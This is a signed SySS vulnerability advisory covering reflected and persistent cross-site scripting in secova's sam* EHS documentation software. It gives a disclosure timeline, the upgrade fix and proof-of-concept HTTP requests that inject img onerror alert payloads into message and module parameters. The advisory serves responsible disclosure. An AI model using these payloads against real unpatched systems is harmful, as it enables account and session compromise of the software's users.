-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-004
Product: sam*
Vendor: secova
Affected Version(s): 5.8.2 and below
Tested Version(s): 5.7.11
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
Solution Status: Fixed
Vendor Notification: 2016-01-08
Solution Date: 2016-04-18
Public Disclosure: 2016-05-24
CVE Reference: Not assigned
Author of Advisory: Franz G. Jahn, SySS GmbH, https://www.syss.de/advisories/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Multiple Cross-Site Scripting vulnerabilities could be identified in the
sam* application.

The sam* application is described as follows [2]:

"sam* is an electronic documentation system and is used primarily in the
areas of health and safety, occupational safety, occupational health,
environmental protection, quality waste management and HR.
(Keyword: EHS Software)
All essential operational requirements for companies are ideally
satisfied with sam*. sam* dovetails the most important main and sub-
disciplines (ISO, OHSAS, knowledge logistics and legal compliance) with
one another."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Failing to properly encode user input, the sam* application is
susceptible to Reflected and Persistent Cross-Site Scripting. The PoC
below shows only two examples of identified vulnerabilities.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1) The following request creates a malicious message containing a vector
for Persistent Cross-Site Scripting:

POST /libs/sam/common/dispatchRequest.php?controller=MessageController&module=newMessage HTTP/1.1
Host: <host>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 434
Cookie: PHPSESSID=<validSessionId>
Connection: close
Pragma: no-cache
Cache-Control: no-cache

messages=[{"msgId"%3a0,"msgParentId"%3a0,"msgRootId"%3a0,"msgSubject"%3a"test<img+src%3dx+onerror%3dalert(456)>","msgMessage"%3a"Message%20Content","msgDate"%3a"","msgData"%3a"","msgArea"%3a"","msgNameId"%3a1234,"msgReceiver"%3a[1234],"msgCreateEach"%3a0,"msgAllowResponse"%3a0}]


2) The following URL can be used for Reflected Cross-Site Scripting:

http://example.com/libs/sam/common/dispatchRequest.php?dc=1450777458983&module=editAttachment<img+src%3dx+onerror%3dalert(123)%3b>&controller=AttachmentController&mode=show


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Upgrade to version 5.8.3 or later

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-12-22: Vulnerability discovered
2016-01-08: Vulnerability reported to vendor
2016-04-18: Release of a fixed version
2016-05-24: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] SySS GmbH, SYSS-2016-004
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-004.txt
[2] Vendor description of sam*
    https://www.secova.de/en/home/what-is-sam/
[3] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:


Security vulnerability found by Franz G. Jahn of the SySS GmbH.

E-Mail: franz.jahn (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Franz_Jahn.asc
Key ID: 0xD06A14DE
Key Fingerprint: 2D26 E435 DF7F 572D A0C9 1DE8 D5A6 1496 D06A 14DE

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJXQzogAAoJENWmFJbQahTeec8P/3UL7etiGIJUVUExrIQypwmm
xzNkobuBmcVrovhmi/83XK5PBe0pNPlfQ7v+qnazKbIYrQS4+0qDlhM7dX7lCKbE
dzst2dj/Peh/LgOGupcOUJupkHYmIlI1+tFl5j/gbbfnPDkrcp+WpPJ3XG329aKE
za5BYsCjgVcyFtCsR4kNvAIem1H9cxpel5bGnQtRruR6u7y2UWd9lJoF3VA3rbOd
p6phDsTUhxZ3xJtcJLtYKXit+3JjzI69ktRkayke+E+W7LTLi5y1CRykvzHkoMwo
9E0t96BnKGEAGUFp7tlOA4ScpIT7rjOEI+sl8qGKX9Ow6GUxSrl4ttnsuAsZK8OF
i5TusOBidvn0yk7U43wVQbemS92T0TsBghvS+PyOvw8tejxI/bM5TRz11OZEUYxm
r1u7kN0J8rMUyGkCNncBNkn2vHdkS7SVmQdJDCjZZtJbYuDy0Tr9bbp1YVW+nxFH
XvKjaN8zcSV7u4cehCVNzXNbMDZW1Y64yRnhhadt0jjIYbjbuE1RjaxevEREXahR
6Ai9zLCQdJWzpzjfUlwT5CFCXBq8SqYcMxPTebGcRfCngQDIN3o7Q29t7dufoeVw
Ojxkhl5KBu0EMW/lhniWrwAs4mkLchTKzSEfxyrtOJxR6ry81JtjauiLtT9NW62U
rjeGixv8CbJkbYGkQcxz
=xAPS
-----END PGP SIGNATURE-----